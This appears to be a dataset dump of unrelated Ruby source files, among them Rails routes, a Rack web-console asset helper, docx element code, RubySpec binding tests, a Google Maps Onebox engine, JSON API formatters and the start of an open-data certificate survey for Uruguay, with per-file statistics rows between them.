draw(:old_route_redirects)
ActiveAdmin.routes(self)
require 'sidekiq/web'
authenticate :user, ->(user) { user.admin? } do
mount Sidekiq::Web => '/sidekiq'
end
resource :github_webhooks, only: :create, defaults: { formats: :json }
unauthenticated do
root 'static_pages#home'
end
authenticated :user do
root to: 'users#show', as: :dashboard
end
devise_for :users, controllers: {
registrations: 'registrations',
omniauth_callbacks: 'omniauth_callbacks',
}
devise_scope :user do
get '/login' => 'devise/sessions#new'
get '/logout' => 'devise/sessions#destroy', method: :delete
get 'sign_up' => 'devise/registrations#new'
get 'signup' => 'devise/registrations#new'
get '/confirm_email' => 'users#send_confirmation_link'
end
namespace :api do
resources :lesson_completions, only: [:index]
resources :points, only: %i[index show create]
end
get 'home' => 'static_pages#home'
get 'about' => 'static_pages#about'
get 'faq' => 'static_pages#faq'
get 'contributing' => 'static_pages#contributing'
get 'terms_of_use' => 'static_pages#terms_of_use'
get 'styleguide' => 'static_pages#style_guide'
get 'success_stories' => 'static_pages#success_stories'
get 'community_rules' => 'static_pages#community_rules'
get 'before_asking' => 'static_pages#before_asking'
get 'how_to_ask' => 'static_pages#how_to_ask'
get 'sitemap' => 'sitemap#index', defaults: { format: 'xml' }
# failure route if github information returns invalid
get '/auth/failure' => 'omniauth_callbacks#failure'
resources :users, only: %i[show update]
namespace :users do
resources :paths, only: :create
resources :progress, only: :destroy
end
# Deprecated Route to Web Development 101 from external links
get '/courses/web-development-101', to: redirect('/courses/foundations')
get '/courses/web-development-101/%{id}', to: redirect('/courses/foundations/%{id}')
get '/courses' => redirect('/paths')
namespace :lessons do
resource :preview, only: %i[show create]
resources :installation_lessons, only: %i[index]
end
namespace :courses do
resources :progress, only: %i[show]
end
resources :lessons, only: :show do
resources :project_submissions, only: %i[index], controller: 'lessons/project_submissions'
resources :lesson_completions, only: %i[create], as: 'completions'
delete 'lesson_completions' => 'lesson_completions#destroy', as: 'lesson_completions'
end
resources :project_submissions do
resources :flags, only: %i[create], controller: 'project_submissions/flags'
resources :likes, controller: 'project_submissions/likes'
end
get '/paths/web-development-101', to: redirect('/paths/foundations')
resources :paths, only: %i[index show] do
resources :courses, only: %i[index show] do
resources :lessons, only: %i[show]
end
end
resources :notifications, only: %i[index update]
resource :themes, only: :update
match '/404' => 'errors#not_found', via: %i[get post patch delete]
# Explicitly redirect deprecated routes (301)
get '/courses/curriculum' => redirect('/courses')
get 'curriculum' => redirect('/courses')
get 'scheduler' => redirect('/courses')
get '/tracks', to: redirect('/paths')
get '/tracks/:id', to: redirect('/paths/%{id}')
end
| 32.396226 | 94 | 0.701514 |
1d0827ba8998d57c3ff7c2d913c2c8fb3c1e8b25 | 2,267 | # encoding: utf-8
module Rack
class Webconsole
# Helper module to encapsulate the asset loading logic used by the {Assets}
# middleware.
#
# For now, the strategy is reading the files from disk. In the future, we
# should come up with a somewhat more sophisticated strategy, although
# {Webconsole} is used only in development environments, where performance
# isn't usually a concern.
#
module AssetHelpers
# Loads the HTML from a file in `/public`.
#
# It contains a form and the needed divs to render the console.
#
# @return [String] the injectable HTML.
def html_code
out = ""
out << asset('jquery.html') if Webconsole.inject_jquery
out << asset('webconsole.html')
out
end
# Loads the CSS from a file in `/public`.
#
# It contains the styles for the console.
#
# @return [String] the injectable CSS.
def css_code
'<style type="text/css">' <<
asset('webconsole.css') <<
'</style>'
end
# Loads the JavaScript from a file in `/public`.
#
# It contains the JavaScript logic of the webconsole.
#
# @return [String] the injectable JavaScript.
def js_code
'<script type="text/javascript">' <<
asset('webconsole.js') <<
'</script>'
end
# Inteprolates the given variables inside the javascrpt code
#
# @param [String] javascript The javascript code to insert the variables
# @param [Hash] variables A hash containing the variables names (as keys)
# and its values
#
# @return [String] the javascript code with the interpolated variables
def render(javascript, variables = {})
javascript_with_variables = javascript.dup
variables.each_pair do |variable, value|
javascript_with_variables.gsub!("$#{variable}", value)
end
javascript_with_variables
end
private
def asset(file)
@assets ||= {}
output = ::File.open(::File.join(::File.dirname(__FILE__), '..', '..', '..', 'public', file), 'r:UTF-8') do |f|
f.read
end
@assets[file] ||= output
end
end
end
end
| 30.635135 | 119 | 0.595942 |
4ac020d5499212d2abd625347526266b93563437 | 2,872 | require 'nokogiri'
require 'docx/elements'
require 'docx/containers'
module Docx
module Elements
module Element
DEFAULT_TAG = ''
# Ensure that a 'tag' corresponding to the XML element that defines the element is defined
def self.included(base)
base.extend(ClassMethods)
base.const_set(:TAG, Element::DEFAULT_TAG) unless base.const_defined?(:TAG)
end
attr_accessor :node
delegate :at_xpath, :xpath, :to => :@node
# TODO: Should create a docx object from this
def parent(type = '*')
@node.at_xpath("./parent::#{type}")
end
# Get parent paragraph of element
def parent_paragraph
Elements::Containers::Paragraph.new(parent('w:p'))
end
# Insertion methods
# Insert node as last child
def append_to(element)
@node = element.node.add_child(@node)
self
end
# Insert node as first child (after properties)
def prepend_to(element)
@node = element.node.properties.add_next_sibling(@node)
self
end
def insert_after(element)
# Returns newly re-parented node
@node = element.node.add_next_sibling(@node)
self
end
def insert_before(element)
@node = element.node.add_previous_sibling(@node)
self
end
# Creation/edit methods
def copy
self.class.new(@node.dup)
end
# A method to wrap content in an HTML tag.
# Currently used in paragraph and text_run for the to_html methods
#
# content:: The base text content for the tag.
# styles:: Hash of the inline CSS styles to be applied. e.g.
# { 'font-size' => '12pt', 'text-decoration' => 'underline' }
#
def html_tag(name, options = {})
content = options[:content]
styles = options[:styles]
html = "<#{name.to_s}"
unless styles.nil? || styles.empty?
styles_array = []
styles.each do |property, value|
next if property == 'font-size'
styles_array << "#{property.to_s}:#{value};"
end
html << " style=\"#{styles_array.join('')}\"" unless styles_array.empty?
end
html << ">"
html << content if content
html << "</#{name.to_s}>"
end
module ClassMethods
def create_with(element)
# Need to somehow get the xml document accessible here by default, but this is alright in the interim
self.new(Nokogiri::XML::Node.new("w:#{self.tag}", element.node))
end
def create_within(element)
new_element = create_with(element)
new_element.append_to(element)
new_element
end
end
end
end
end
| 29.306122 | 112 | 0.571379 |
7a6dddd26d99107322cf3681048c06d9bf664cfd | 142 | class AddProfileToShirts < ActiveRecord::Migration
def change
add_reference :shirts, :profile, index: true, foreign_key: true
end
end
| 23.666667 | 67 | 0.767606 |
5df108da2a018a69e0efe67dc71d0d30de766503 | 478 | require 'stringio'
module Puppet::Parser::Functions
newfunction(:generate_options, type: :rvalue) do |args|
options = args[0]
buffer = StringIO.new
buffer << "options {\n"
indent = ' '
return '' if options.empty?
options.keys.sort.each do |option|
value = options[option]
buffer << indent
buffer << option
buffer << '('
buffer << value
buffer << ");\n"
end
buffer << "};\n"
buffer.string
end
end
| 19.916667 | 57 | 0.575314 |
183321c9b7a3897c9040915f3c396b098fe7942e | 230 | # frozen_string_literal = true
require './lib/todoable'
require 'minitest/autorun'
require 'webmock/minitest'
require 'vcr'
require 'pry'
VCR.configure do |c|
c.cassette_library_dir = "test/fixtures"
c.hook_into :webmock
end | 19.166667 | 42 | 0.76087 |
6a3f8c95cdfb1e945603f8600188259f7683ac07 | 356 | require "indicator.rb"
ActionView::Base.send(:include, Indicator::InstanceMethods)
# install files
%w[/public/images /public/javascripts /public/stylesheets].each{|dir|
source = File.join(directory,dir)
dest = RAILS_ROOT + dir
FileUtils.cp_r(Dir.glob(source+'/*.*'), dest)
} unless File.exists?(RAILS_ROOT + '/public/images/indicator.gif')
| 35.6 | 70 | 0.719101 |
ed1a07e24bafa327a3b84ba2337bc15fbb52687f | 152 | require 'test_helper'
module EventLogger
class EventTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
end
| 15.2 | 43 | 0.677632 |
e9fca6e3abb59eab298e07f0d792cfebc8a29be7 | 1,344 | require_relative '../../spec_helper'
require_relative 'fixtures/classes'
describe "Kernel.binding" do
it "returns a binding for the caller" do
Kernel.binding.eval("self").should == self
end
end
describe "Kernel#binding" do
it "is a private method" do
Kernel.should have_private_instance_method(:binding)
end
before :each do
@b1 = KernelSpecs::Binding.new(99).get_binding
ScratchPad.clear
end
it "returns a Binding object" do
@b1.kind_of?(Binding).should == true
end
it "encapsulates the execution context properly" do
eval("@secret", @b1).should == 100
eval("a", @b1).should == true
eval("b", @b1).should == true
eval("@@super_secret", @b1).should == "password"
eval("square(2)", @b1).should == 4
eval("self.square(2)", @b1).should == 4
eval("a = false", @b1)
eval("a", @b1).should == false
end
it "raises a NameError on undefined variable" do
lambda { eval("a_fake_variable", @b1) }.should raise_error(NameError)
end
it "uses the closure's self as self in the binding" do
m = mock(:whatever)
eval('self', m.send(:binding)).should == self
end
it "uses the class as self in a Class.new block" do
m = mock(:whatever)
cls = Class.new { ScratchPad.record eval('self', m.send(:binding)) }
ScratchPad.recorded.should == cls
end
end
| 25.846154 | 73 | 0.65625 |
913dea7615c7a8027b88d1eda24ab6f59b1fb234 | 188 | class ChangeTypeNameFieldToString < ActiveRecord::Migration
def change
remove_column :quotation_prices, :name
add_column :quotation_prices, :name, :string, default: ""
end
end
| 26.857143 | 61 | 0.765957 |
6a82cb9fabb3571ffa6c7b04f2b1d7ad6e32a631 | 53 | module SqlOptimizer
VERSION = '0.1.3'.freeze
end
| 8.833333 | 26 | 0.698113 |
4aa2cd6c5f58efaac3c9cea3061791730a2cd6ea | 1,894 | module JSONAPI
class Formatter
class << self
def format(arg)
arg.to_s
end
def unformat(arg)
arg
end
# :nocov:
if RUBY_VERSION >= '2.0'
def formatter_for(format)
formatter_class_name = "#{format.to_s.camelize}Formatter"
Object.const_get formatter_class_name if formatter_class_name
end
else
def formatter_for(format)
formatter_class_name = "#{format.to_s.camelize}Formatter"
formatter_class_name.safe_constantize if formatter_class_name
end
end
# :nocov:
end
end
class KeyFormatter < Formatter
class << self
def format(key)
super
end
def unformat(formatted_key)
super.to_sym
end
end
end
class ValueFormatter < Formatter
class << self
def format(raw_value, context)
super(raw_value)
end
def unformat(value, context)
super(value)
end
def value_formatter_for(type)
formatter_name = "#{type.to_s.camelize}Value"
formatter_for(formatter_name)
end
end
end
end
class UnderscoredKeyFormatter < JSONAPI::KeyFormatter
end
class CamelizedKeyFormatter < JSONAPI::KeyFormatter
class << self
def format(key)
super.camelize(:lower)
end
def unformat(formatted_key)
formatted_key.to_s.underscore.to_sym
end
end
end
class DasherizedKeyFormatter < JSONAPI::KeyFormatter
class << self
def format(key)
super.dasherize
end
def unformat(formatted_key)
formatted_key.to_s.underscore.to_sym
end
end
end
class DefaultValueFormatter < JSONAPI::ValueFormatter
class << self
def format(raw_value, context)
case raw_value
when String, Integer
return raw_value
else
return raw_value.to_s
end
end
end
end | 19.729167 | 71 | 0.635692 |
acc054eb9ed8ec6a0331061e39adc9502429326c | 6,683 | module Onebox
module Engine
class GoogleMapsOnebox
include Engine
class << self
def ===(other)
if other.kind_of? URI
@@matchers && @@matchers.any? { |m| other.to_s =~ m[:regexp] }
else
super
end
end
private
def matches_regexp(key, regexp)
(@@matchers ||= []) << { key: key, regexp: regexp }
end
end
always_https
# Matches shortened Google Maps URLs
matches_regexp :short, %r"^(https?:)?//goo\.gl/maps/"
# Matches URLs for custom-created maps
matches_regexp :custom, %r"^(?:https?:)?//www\.google(?:\.(?:\w{2,}))+/maps/d/(?:edit|viewer|embed)\?mid=.+$"
# Matches URLs with streetview data
matches_regexp :streetview, %r"^(?:https?:)?//www\.google(?:\.(?:\w{2,}))+/maps[^@]+@(?<lon>-?[\d.]+),(?<lat>-?[\d.]+),(?:\d+)a,(?<zoom>[\d.]+)y,(?<heading>[\d.]+)h,(?<pitch>[\d.]+)t.+?data=.*?!1s(?<pano>[^!]{22})"
# Matches "normal" Google Maps URLs with arbitrary data
matches_regexp :standard, %r"^(?:https?:)?//www\.google(?:\.(?:\w{2,}))+/maps"
# Matches URLs for the old Google Maps domain which we occasionally get redirected to
matches_regexp :canonical, %r"^(?:https?:)?//maps\.google(?:\.(?:\w{2,}))+/maps\?"
def initialize(url, cache = nil, timeout = nil)
super
resolve_url!
rescue Net::HTTPServerException, Timeout::Error, Net::HTTPError, Errno::ECONNREFUSED, RuntimeError => err
raise ArgumentError, "malformed url or unresolveable: #{err.message}"
end
def streetview?
!!@streetview
end
def to_html
"<div class='maps-onebox'><iframe src=\"#{link}\" width=\"690\" height=\"400\" frameborder=\"0\" style=\"border:0\">#{placeholder_html}</iframe></div>"
end
def placeholder_html
width = @placeholder_width || 690
height = @placeholder_height || 400
"<img src='#{@placeholder}' width='#{width}' height='#{height}'/>"
end
private
def data
{ link: url, title: url }
end
def resolve_url!
@streetview = false
type, match = match_url
# Resolve shortened URL, if necessary
if type == :short
follow_redirect!
type, match = match_url
end
# Try to get the old-maps URI, it is far easier to embed.
if type == :standard
retry_count = 10
while (retry_count -= 1) > 0
follow_redirect!
type, match = match_url
break if type != :standard
sleep 0.1
end
end
case type
when :standard
# Fallback for map URLs that don't resolve into an easily embeddable old-style URI
# Roadmaps use a "z" zoomlevel, satellite maps use "m" the horizontal width in meters
# TODO: tilted satellite maps using "a,y,t"
match = @url.match(/@(?<lon>[\d.-]+),(?<lat>[\d.-]+),(?<zoom>\d+)(?<mz>[mz])/)
raise "unexpected standard url #{@url}" unless match
zoom = match[:mz] == "z" ? match[:zoom] : Math.log2(57280048.0 / match[:zoom].to_f).round
location = "#{match[:lon]},#{match[:lat]}"
url = "https://maps.google.com/maps?ll=#{location}&z=#{zoom}&output=embed&dg=ntvb"
url += "&q=#{$1}" if match = @url.match(/\/place\/([^\/\?]+)/)
url += "&cid=#{($1 + $2).to_i(16)}" if @url.match(/!3m1!1s0x(\h{16}):0x(\h{16})/)
@url = url
@placeholder = "https://maps.googleapis.com/maps/api/staticmap?maptype=roadmap¢er=#{location}&zoom=#{zoom}&size=690x400&sensor=false"
when :custom
url = @url.dup
@url = rewrite_custom_url(url, "embed")
@placeholder = rewrite_custom_url(url, "thumbnail")
@placeholder_height = @placeholder_width = 120
when :streetview
@streetview = true
panoid = match[:pano]
lon = match[:lon].to_f.to_s
lat = match[:lat].to_f.to_s
heading = match[:heading].to_f.round(4).to_s
pitch = (match[:pitch].to_f / 10.0).round(4).to_s
fov = (match[:zoom].to_f / 100.0).round(4).to_s
zoom = match[:zoom].to_f.round
@url = "https://www.google.com/maps/embed?pb=!3m2!2sen!4v0!6m8!1m7!1s#{panoid}!2m2!1d#{lon}!2d#{lat}!3f#{heading}!4f#{pitch}!5f#{fov}"
@placeholder = "https://maps.googleapis.com/maps/api/streetview?size=690x400&location=#{lon},#{lat}&pano=#{panoid}&fov=#{zoom}&heading=#{heading}&pitch=#{pitch}&sensor=false"
when :canonical
uri = URI(@url)
query = URI::decode_www_form(uri.query).to_h
if !query.has_key?("ll")
raise ArgumentError, "canonical url lacks location argument" unless query.has_key?("sll")
query["ll"] = query["sll"]
@url += "&ll=#{query["sll"]}"
end
location = query["ll"]
if !query.has_key?("z")
raise ArgumentError, "canonical url has incomplete query arguments" unless query.has_key?("spn") || query.has_key?("sspn")
if !query.has_key?("spn")
query["spn"] = query["sspn"]
@url += "&spn=#{query["sspn"]}"
end
angle = query["spn"].split(",").first.to_f
zoom = (Math.log(690.0 * 360.0 / angle / 256.0) / Math.log(2)).round
else
zoom = query["z"]
end
@url = @url.sub('output=classic', 'output=embed')
@placeholder = "https://maps.googleapis.com/maps/api/staticmap?maptype=roadmap&size=690x400&sensor=false¢er=#{location}&zoom=#{zoom}"
else
raise "unexpected url type #{type.inspect}"
end
end
def match_url
@@matchers.each do |matcher|
if m = matcher[:regexp].match(@url)
return matcher[:key], m
end
end
raise ArgumentError, "\"#{@url}\" does not match any known pattern"
end
def rewrite_custom_url(url, target)
uri = URI(url)
uri.path = uri.path.sub(/(?<=^\/maps\/d\/)\w+$/, target)
uri.to_s
end
def follow_redirect!
uri = URI(@url)
begin
http = Net::HTTP.start(uri.host, uri.port,
use_ssl: uri.scheme == 'https', open_timeout: timeout, read_timeout: timeout)
response = http.head(uri.path)
raise "unexpected response code #{response.code}" unless %w(301 302).include?(response.code)
@url = response["Location"]
ensure
http.finish rescue nil
end
end
end
end
end
| 37.127778 | 220 | 0.546611 |
ab09f41612313913f1f80fbc521b5376711af842 | 140,382 | survey 'UY',
:full_title => 'Uruguay',
:default_mandatory => 'false',
:status => 'alpha',
:description => '<p><strong>This has been generated based on a default and needs to be localised for Uruguay. Please help us! Contact <a href="mailto:[email protected]">[email protected]</a></strong></p><p>This self-assessment questionnaire generates an open data certificate and badge you can publish to tell people all about this open data. We also use your answers to learn how organisations publish open data.</p><p>When you answer these questions it demonstrates your efforts to comply with relevant legislation. You should also check which other laws and policies apply to your sector.</p><p><strong>You do not need to answer all the questions to get a certificate.</strong> Just answer those you can.</p>' do
translations :en => :default
section_general 'General Information',
:description => '',
:display_header => false do
q_dataTitle 'What\'s this data called?',
:discussion_topic => :dataTitle,
:help_text => 'People see the name of your open data in a list of similar ones so make this as unambiguous and descriptive as you can in this tiny box so they quickly identify what\'s unique about it.',
:required => :required
a_1 'Data Title',
:string,
:placeholder => 'Data Title',
:required => :required
q_documentationUrl 'Where is it described?',
:discussion_topic => :documentationUrl,
:display_on_certificate => true,
:text_as_statement => 'This data is described at',
:help_text => 'Give a URL for people to read about the contents of your open data and find more detail. It can be a page within a bigger catalog like data.gov.uk.'
a_1 'Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Documentation URL',
:requirement => ['pilot_1', 'basic_1']
label_pilot_1 'You should have a <strong>web page that offers documentation</strong> about the open data you publish so that people can understand its context, content and utility.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_1'
dependency :rule => 'A and B'
condition_A :q_releaseType, '!=', :a_collection
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
label_basic_1 'You must have a <strong>web page that gives documentation</strong> and access to the open data you publish so that people can use it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_1'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_collection
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
q_publisher 'Who publishes this data?',
:discussion_topic => :publisher,
:display_on_certificate => true,
:text_as_statement => 'This data is published by',
:help_text => 'Give the name of the organisation who publishes this data. It’s probably who you work for unless you’re doing this on behalf of someone else.',
:required => :required
a_1 'Data Publisher',
:string,
:placeholder => 'Data Publisher',
:required => :required
q_publisherUrl 'What website is the data published on?',
:discussion_topic => :publisherUrl,
:display_on_certificate => true,
:text_as_statement => 'The data is published on',
:help_text => 'Give a URL to a website, this helps us to group data from the same organisation even if people give different names.'
a_1 'Publisher URL',
:string,
:input_type => :url,
:placeholder => 'Publisher URL'
q_releaseType 'What kind of release is this?',
:discussion_topic => :releaseType,
:pick => :one,
:required => :required
a_oneoff 'a one-off release of a single dataset',
:help_text => 'This is a single file and you don’t currently plan to publish similar files in the future.'
a_collection 'a one-off release of a set of related datasets',
:help_text => 'This is a collection of related files about the same data and you don’t currently plan to publish similar collections in the future.'
a_series 'ongoing release of a series of related datasets',
:help_text => 'This is a sequence of datasets with planned periodic updates in the future.'
a_service 'a service or API for accessing open data',
:help_text => 'This is a live web service that exposes your data to programmers through an interface they can query.'
end
section_legal 'Legal Information',
:description => 'Rights, licensing and privacy' do
label_group_2 'Rights',
:help_text => 'your right to share this data with people',
:customer_renderer => '/partials/fieldset'
q_publisherRights 'Do you have the rights to publish this data as open data?',
:discussion_topic => :uy_publisherRights,
:help_text => 'If your organisation didn\'t originally create or gather this data then you might not have the right to publish it. If you’re not sure, check with the data owner because you will need their permission to publish it.',
:requirement => ['basic_2'],
:pick => :one,
:required => :required
a_yes 'yes, you have the rights to publish this data as open data',
:requirement => ['standard_1']
a_no 'no, you don\'t have the rights to publish this data as open data'
a_unsure 'you\'re not sure if you have the rights to publish this data as open data'
a_complicated 'the rights in this data are complicated or unclear'
label_standard_1 'You should have a <strong>clear legal right to publish this data</strong>.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_1'
dependency :rule => 'A'
condition_A :q_publisherRights, '!=', :a_yes
label_basic_2 'You must have the <strong>right to publish this data</strong>.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_2'
dependency :rule => 'A'
condition_A :q_publisherRights, '==', :a_no
q_rightsRiskAssessment 'Where do you detail the risks people might encounter if they use this data?',
:discussion_topic => :uy_rightsRiskAssessment,
:display_on_certificate => true,
:text_as_statement => 'Risks in using this data are described at',
:help_text => 'It can be risky for people to use data without a clear legal right to do so. For example, the data might be taken down in response to a legal challenge. Give a URL for a page that describes the risk of using this data.'
dependency :rule => 'A'
condition_A :q_publisherRights, '==', :a_complicated
a_1 'Risk Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Risk Documentation URL',
:requirement => ['pilot_2']
label_pilot_2 'You should document <strong>risks associated with using this data</strong>, so people can work out how they want to use it.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_2'
dependency :rule => 'A and B'
condition_A :q_publisherRights, '==', :a_complicated
condition_B :q_rightsRiskAssessment, '==', {:string_value => '', :answer_reference => '1'}
q_publisherOrigin 'Was <em>all</em> this data originally created or gathered by you?',
:discussion_topic => :uy_publisherOrigin,
:display_on_certificate => true,
:text_as_statement => 'This data was',
:help_text => 'If any part of this data was sourced outside your organisation by other individuals or organisations then you need to give extra information about your right to publish it.',
:pick => :one,
:required => :required
dependency :rule => '(A or B)'
condition_A :q_publisherRights, '==', :a_yes
condition_B :q_publisherRights, '==', :a_unsure
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'originally created or generated by its curator'
q_thirdPartyOrigin 'Was some of this data extracted or calculated from other data?',
:discussion_topic => :uy_thirdPartyOrigin,
:help_text => 'An extract or smaller part of someone else\'s data still means your rights to use it might be affected. There might also be legal issues if you analysed their data to produce new results from it.',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
a_false 'no'
a_true 'yes',
:requirement => ['basic_3']
label_basic_3 'You indicated that this data wasn\'t originally created or gathered by you, and wasn\'t crowdsourced, so it must have been extracted or calculated from other data sources.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_3'
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_false
condition_D :q_thirdPartyOrigin, '!=', :a_true
q_thirdPartyOpen 'Are <em>all</em> sources of this data already published as open data?',
:discussion_topic => :uy_thirdPartyOpen,
:display_on_certificate => true,
:text_as_statement => 'This data is created from',
:help_text => 'You\'re allowed to republish someone else\'s data if it\'s already under an open data licence or if their rights have expired or been waived. If any part of this data is not like this then you\'ll need legal advice before you can publish it.',
:pick => :one,
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_thirdPartyOrigin, '==', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'open data sources',
:requirement => ['basic_4']
label_basic_4 'You should get <strong>legal advice to make sure you have the right to publish this data</strong>.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_4'
dependency :rule => 'A and B and C and D and E'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_thirdPartyOrigin, '==', :a_true
condition_D :q_thirdPartyOpen, '==', :a_false
condition_E :q_thirdPartyOpen, '==', :a_false
q_crowdsourced 'Was some of this data crowdsourced?',
:discussion_topic => :uy_crowdsourced,
:display_on_certificate => true,
:text_as_statement => 'Some of this data is',
:help_text => 'If the data includes information contributed by people outside your organisation, you need their permission to publish their contributions as open data.',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'crowdsourced',
:requirement => ['basic_5']
label_basic_5 'You indicated that the data wasn\'t originally created or gathered by you, and wasn\'t extracted or calculated from other data, so it must have been crowdsourced.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_5'
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_thirdPartyOrigin, '==', :a_false
condition_D :q_crowdsourced, '!=', :a_true
q_crowdsourcedContent 'Did contributors to this data use their judgement?',
:discussion_topic => :uy_crowdsourcedContent,
:help_text => 'If people used their creativity or judgement to contribute data then they have copyright over their work. For example, writing a description or deciding whether or not to include some data in a dataset would require judgement. So contributors must transfer or waive their rights, or license the data to you before you can publish it.',
:pick => :one,
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
a_false 'no'
a_true 'yes'
q_claUrl 'Where is the Contributor Licence Agreement (CLA)?',
:discussion_topic => :uy_claUrl,
:display_on_certificate => true,
:text_as_statement => 'The Contributor Licence Agreement is at',
:help_text => 'Give a link to an agreement that shows contributors allow you to reuse their data. A CLA will either transfer contributor\'s rights to you, waive their rights, or license the data to you so you can publish it.',
:help_text_more_url => 'http://en.wikipedia.org/wiki/Contributor_License_Agreement',
:required => :required
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
condition_D :q_crowdsourcedContent, '==', :a_true
a_1 'Contributor Licence Agreement URL',
:string,
:input_type => :url,
:placeholder => 'Contributor Licence Agreement URL',
:required => :required
q_cldsRecorded 'Have all contributors agreed to the Contributor Licence Agreement (CLA)?',
:discussion_topic => :uy_cldsRecorded,
:help_text => 'Check all contributors agree to a CLA before you reuse or republish their contributions. You should keep a record of who gave contributions and whether or not they agree to the CLA.',
:pick => :one,
:required => :required
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
condition_D :q_crowdsourcedContent, '==', :a_true
a_false 'no'
a_true 'yes',
:requirement => ['basic_6']
label_basic_6 'You must get <strong>contributors to agree to a Contributor Licence Agreement</strong> (CLA) that gives you the right to publish their work as open data.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_6'
dependency :rule => 'A and B and C and D and E'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
condition_D :q_crowdsourcedContent, '==', :a_true
condition_E :q_cldsRecorded, '==', :a_false
q_sourceDocumentationUrl 'Where do you describe sources of this data?',
:discussion_topic => :uy_sourceDocumentationUrl,
:display_on_certificate => true,
:text_as_statement => 'The sources of this data are described at',
:help_text => 'Give a URL that documents where the data was sourced from (its provenance) and the rights under which you publish the data. This helps people understand where the data comes from.'
dependency :rule => 'A'
condition_A :q_publisherOrigin, '==', :a_false
a_1 'Data Sources Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Data Sources Documentation URL',
:requirement => ['pilot_3']
label_pilot_3 'You should document <strong>where the data came from and the rights under which you publish it</strong>, so people are assured they can use parts which came from third parties.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_3'
dependency :rule => 'A and B'
condition_A :q_publisherOrigin, '==', :a_false
condition_B :q_sourceDocumentationUrl, '==', {:string_value => '', :answer_reference => '1'}
q_sourceDocumentationMetadata 'Is documentation about the sources of this data also in machine-readable format?',
:discussion_topic => :uy_sourceDocumentationMetadata,
:display_on_certificate => true,
:text_as_statement => 'The curator has published',
:help_text => 'Information about data sources should be human-readable so people can understand it, as well as in a metadata format that computers can process. When everyone does this it helps other people find out how the same open data is being used and justify its ongoing publication.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_publisherOrigin, '==', :a_false
condition_B :q_sourceDocumentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'machine-readable data about the sources of this data',
:requirement => ['standard_2']
label_standard_2 'You should <strong>include machine-readable data about the sources of this data</strong>.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_2'
dependency :rule => 'A and B and C'
condition_A :q_publisherOrigin, '==', :a_false
condition_B :q_sourceDocumentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_C :q_sourceDocumentationMetadata, '==', :a_false
label_group_3 'Licensing',
:help_text => 'how you give people permission to use this data',
:customer_renderer => '/partials/fieldset'
q_copyrightURL 'Where have you published the rights statement for this dataset?',
:discussion_topic => :uy_copyrightURL,
:display_on_certificate => true,
:text_as_statement => 'The rights statement is at',
:help_text => 'Give the URL to a page that describes the right to re-use this dataset. This should include a reference to its license, attribution requirements, and a statement about relevant copyright. A rights statement helps people understand what they can and can\'t do with the data.'
a_1 'Rights Statement URL',
:string,
:input_type => :url,
:placeholder => 'Rights Statement URL',
:requirement => ['pilot_4']
label_pilot_4 'You should <strong>publish a rights statement</strong> that details copyright, licensing and how people should give attribution to the data.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_4'
dependency :rule => 'A'
condition_A :q_copyrightURL, '==', {:string_value => '', :answer_reference => '1'}
q_dataLicence 'Under which licence can people reuse this data?',
:discussion_topic => :uy_dataLicence,
:display_on_certificate => true,
:text_as_statement => 'This data is available under',
:help_text => 'Remember that whoever spends intellectual effort creating content automatically gets rights over it. Creative content includes the organisation and selection of items within data, but does not include facts. So people need a waiver or a licence which proves that they can use the data and explains how they can do that legally. We list the most common licenses here; if there is no copyright in the data, it\'s expired, or you\'ve waived them, choose \'Not applicable\'.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
a_cc_by 'Creative Commons Attribution',
